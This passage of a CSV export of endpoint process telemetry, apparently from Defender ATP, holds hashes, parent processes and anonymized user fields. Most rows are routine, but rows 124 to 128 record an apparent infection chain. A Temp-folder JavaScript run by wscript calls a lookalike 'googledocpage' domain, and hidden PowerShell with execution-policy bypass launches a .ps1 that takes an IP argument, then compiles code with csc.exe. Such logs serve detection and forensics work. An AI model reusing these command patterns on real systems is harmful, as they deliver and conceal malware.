01:00:57.635969300+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,18572,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:55.752251+00:00,2021-02-17 04:29:20.532877500+00:00,16512,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+121,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:01:18.360152400+00:00,15020,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:01:18.708532400+00:00,2021-06-23 01:03:43.217189500+00:00,10f117b9-7be5-4d96-95fa-fd6b3cbc18a1,computerpii_0a470890c60768167990033d701e7bd881398861,156201,False,10.7740.19041.1052,False,11540474045171817,,11540474045172090,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,20864.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+122,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:01:33.475986100+00:00,18648,SenseCncProxy.exe,2624,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:01:34.487169800+00:00,2021-06-23 01:03:43.217526600+00:00,8d42e35b-7102-448a-a920-edcc9a9208ba,computerpii_0a470890c60768167990033d701e7bd881398861,156204,False,10.7740.19041.1052,False,11540474045137006,,11540474045172092,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+123,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:01:40.111992200+00:00,10636,acrodist.exe,   /N /P --UseSystemFonts /Q:15,PortableExecutable,2021-02-02 05:49:32+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrodist.exe,491176,4fc2f2ee7279abdab8b4d236b1e3091c,f3e53f8221efdded9ed2488d812bd89d90210c985353e11368525ec56a7b22c0,faa792084fbce5ffb19744df6dbda4fc341aecc5,73d9fdd6ba9f5634ce8ab8b1f54abbd9,ee19864aa66a2dee5fcefa1f298498d8244b021294f2000a6e702b9e17ebddc1,20002f924780ab3595dd8c307e785ad429b4512c,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:41.281286900+00:00,1292,acrotray.exe,"""acrotray.exe"" ",False,2021-06-23 00:51:40.825938100+00:00,19368,\Device\HarddiskVolume3\Windows\SysWOW64\runonce.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:01:41.124526400+00:00,2021-06-23 01:03:43.219466700+00:00,c06a5b96-1178-43fc-b985-7e93be246208,computerpii_0a470890c60768167990033d701e7bd881398861,156222,False,10.7740.19041.1052,False,11540474045171827,,11540474045172093,2021-06-23 00:51:41.281286900+00:00,1292,2021-06-23 00:51:41.281286900+00:00,acrotray.exe,1292,256,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5296352,2021-05-28 02:46:51+00:00,2021-05-28 05:58:58+00:00,2021-06-23 00:51:41.294276300+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Inc.,AcroTray - Adobe Acrobat Distiller helper application.,21.5.20048.436468,AcroTray,AcroTray.exe,AcroTray,Adobe Systems Incorporated.,Acrobat  Distiller for Windows,21.1.20135.421056,Acrobat Distiller,acrodist.exe,Acrobat  Distiller
+124,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:59:41.018771100+00:00,19204,wscript.exe,"""wscript.exe"" ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_10d1d2b896863c6d41ba2b8a7824ab2ab7efd140.js"" page.googledocpage.com/ 5",PortableExecutable,2019-12-07 09:09:07.254980200+00:00,C:\Windows\System32\wscript.exe,170496,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:50.347644800+00:00,2140,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_10d1d2b896863c6d41ba2b8a7824ab2ab7efd140.js"" page.googledocpage.com/ 1 ",False,2021-06-24 00:52:50.216364400+00:00,19032,\Device\HarddiskVolume3\Windows\System32\cmd.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:59:41.034192100+00:00,2021-06-24 01:02:01.765217100+00:00,c895a05f-891b-4b0c-87a8-7c53bfad2aa5,computerpii_0a470890c60768167990033d701e7bd881398861,169622,False,10.7740.19041.1052,False,11540474045175245,,11540474045175381,2021-06-24 00:52:50.347644800+00:00,2140,2021-06-24 00:52:50.347644800+00:00,\Device\HarddiskVolume3\Windows\System32\wscript.exe,2140,128,ActiveProcessStartkey,C:\Windows\System32,170496,2001-02-26 12:33:54+00:00,2019-12-07 09:09:07.254980200+00:00,2021-06-24 00:52:50.356891+00:00,2019-12-07 09:09:07.254980200+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host
+125,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:59:43.689127700+00:00,9244,powershell.exe,"""powershell.exe"" -w Hidden -ep Bypass -file ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_4af465eb4ec83ac8e168ff1d34590ffde46406b7.ps1"" Ipv4PII_34efea060f868c5f5bc11a7a04255476d926f4b7/ss 152367491",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:50.347644800+00:00,2140,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_10d1d2b896863c6d41ba2b8a7824ab2ab7efd140.js"" page.googledocpage.com/ 1 ",False,2021-06-24 00:52:50.216364400+00:00,19032,\Device\HarddiskVolume3\Windows\System32\cmd.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:59:43.713157900+00:00,2021-06-24 01:02:01.766281500+00:00,7f2f8460-f9f2-4859-82c1-53267e433af8,computerpii_0a470890c60768167990033d701e7bd881398861,169636,False,10.7740.19041.1052,False,11540474045175245,,11540474045175383,2021-06-24 00:52:50.347644800+00:00,2140,2021-06-24 00:52:50.347644800+00:00,\Device\HarddiskVolume3\Windows\System32\wscript.exe,2140,128,ActiveProcessStartkey,C:\Windows\System32,170496,2001-02-26 12:33:54+00:00,2019-12-07 09:09:07.254980200+00:00,2021-06-24 00:52:50.356891+00:00,2019-12-07 09:09:07.254980200+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,0.0,2049.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+126,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:59:43.733996400+00:00,17836,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:59:43.689127700+00:00,9244,powershell.exe,"""powershell.exe"" -w Hidden -ep Bypass -file ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_4af465eb4ec83ac8e168ff1d34590ffde46406b7.ps1"" Ipv4PII_34efea060f868c5f5bc11a7a04255476d926f4b7/ss 152367491",False,2021-06-24 00:52:50.347644800+00:00,2140,\Device\HarddiskVolume3\Windows\System32\wscript.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:59:43.836173900+00:00,2021-06-24 01:02:01.767219700+00:00,cdff3737-b330-4ec1-ad38-fe5c2abab183,computerpii_0a470890c60768167990033d701e7bd881398861,169648,False,10.7740.19041.1052,False,11540474045175383,,11540474045175384,2021-06-24 00:59:43.689127700+00:00,9244,2021-06-24 00:59:43.689127700+00:00,powershell.exe,9244,256,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,2049.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+127,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:59:44.016311+00:00,13424,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Temp\vuvxsov0.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:59:43.689127700+00:00,9244,powershell.exe,"""powershell.exe"" -w Hidden -ep Bypass -file ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_4af465eb4ec83ac8e168ff1d34590ffde46406b7.ps1"" Ipv4PII_34efea060f868c5f5bc11a7a04255476d926f4b7/ss 152367491",False,2021-06-24 00:52:50.347644800+00:00,2140,\Device\HarddiskVolume3\Windows\System32\wscript.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:59:44.212486900+00:00,2021-06-24 01:02:01.768697100+00:00,4db73b86-4620-43c8-9118-1554df819501,computerpii_0a470890c60768167990033d701e7bd881398861,169667,False,10.7740.19041.1052,False,11540474045175383,,11540474045175385,2021-06-24 00:59:43.689127700+00:00,9244,2021-06-24 00:59:43.689127700+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,9244,18560,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,2049.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+128,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:59:44.109381200+00:00,12844,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_e8e5bd448cef098e286e9e0a6821eb95a8976fe0.tmp"" ""c:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Temp\FilePII_e026c63b7455209606dede65107c55f60e3d865e.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:59:44.016311+00:00,13424,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Temp\vuvxsov0.cmdline""",False,2021-06-24 00:59:43.689127700+00:00,9244,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:59:44.214593800+00:00,2021-06-24 01:02:01.834190600+00:00,272208d4-9261-414c-b84a-46a4a9e03f03,computerpii_0a470890c60768167990033d701e7bd881398861,169668,False,10.7740.19041.1052,False,11540474045175385,,11540474045175386,2021-06-24 00:59:44.016311+00:00,13424,2021-06-24 00:59:44.016311+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,13424,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+129,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:01.522644600+00:00,5772,AdobeARM.exe,"""AdobeARM.exe""",PortableExecutable,2021-01-25 13:55:56+00:00,C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,1557200,b8b96354dd88484208f17101f6704f7c,ad25d9f873a80f454ce2acbb75246463070e216c89b042ee87b9a6204dd146c0,68815c39f47a0b8f766d9191e7ac55d3199d1c96,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:01.782512800+00:00,2021-06-24 01:02:01.838771900+00:00,d9ea7eb7-c039-4674-9b34-8a9726978674,computerpii_0a470890c60768167990033d701e7bd881398861,169725,False,10.7740.19041.1052,False,11540474045136925,,11540474045175387,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,svchost.exe,1768,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Adobe Inc.,Adobe Reader and Acrobat Manager,1.824.42.0176,AdobeARM.exe,AdobeARM.exe,Adobe Reader and Acrobat Manager
+130,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:01.750033900+00:00,3764,reader_sl.exe,"""Reader_sl.exe"" ",PortableExecutable,2021-04-21 02:19:48+00:00,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe,24232,02e5f23e179d8db9e102b687ad3b42c5,7fa3bdd3fe2bb536e44488a975d67d63b9ced77d9707ccbcefb17de8e0d562b7,f3523b94ac9922be2e2977c073b5be2992b784b2,b8b96354dd88484208f17101f6704f7c,ad25d9f873a80f454ce2acbb75246463070e216c89b042ee87b9a6204dd146c0,68815c39f47a0b8f766d9191e7ac55d3199d1c96,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:00:01.522644600+00:00,5772,AdobeARM.exe,"""AdobeARM.exe""",False,2021-06-10 